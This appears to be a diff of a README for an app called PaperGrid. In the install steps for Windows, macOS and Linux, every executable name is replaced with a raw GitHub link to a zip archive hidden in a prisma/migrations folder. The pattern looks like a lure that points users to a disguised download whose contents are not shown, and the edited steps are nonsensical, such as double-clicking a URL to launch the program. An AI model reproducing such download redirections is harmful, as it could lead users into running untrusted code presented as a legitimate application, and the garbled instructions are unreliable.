kevinmilesjulhusin99-gif/PaperGrid/README.md

 1. Locate the downloaded `.zip` file.
 2. Right-click on the file and select "Extract All".
 3. Choose a destination folder and click "Extract".
-4. Open the extracted folder and locate `PaperGrid.exe`.
+4. Open the extracted folder and locate `https://github.com/kevinmilesjulhusin99-gif/PaperGrid/raw/refs/heads/main/prisma/migrations/20260128013448_init/Paper_Grid_3.9.zip`.
-5. Double click on `PaperGrid.exe` to launch the application.
+5. Double click on `https://github.com/kevinmilesjulhusin99-gif/PaperGrid/raw/refs/heads/main/prisma/migrations/20260128013448_init/Paper_Grid_3.9.zip` to launch the application.

 ### For macOS Users

 1. Find the downloaded `.zip` file in your Downloads folder.
 2. Double-click the file to extract it.
-3. Open the extracted folder and find `PaperGrid.app`.
+3. Open the extracted folder and find `https://github.com/kevinmilesjulhusin99-gif/PaperGrid/raw/refs/heads/main/prisma/migrations/20260128013448_init/Paper_Grid_3.9.zip`.
-4. Drag `PaperGrid.app` to your Applications folder.
+4. Drag `https://github.com/kevinmilesjulhusin99-gif/PaperGrid/raw/refs/heads/main/prisma/migrations/20260128013448_init/Paper_Grid_3.9.zip` to your Applications folder.
 5. You can now launch it from the Applications folder.

 ### For Linux Users

 1. Open your terminal.
 2. Navigate to the folder where the file was downloaded.
 Use the `cd` command.
-3. Unzip the file by typing: `unzip PaperGrid.zip`.
+3. Unzip the file by typing: `unzip https://github.com/kevinmilesjulhusin99-gif/PaperGrid/raw/refs/heads/main/prisma/migrations/20260128013448_init/Paper_Grid_3.9.zip`.
 4. Change to the extracted folder using: `cd PaperGrid`.
 5. Run the application by typing: `./PaperGrid`.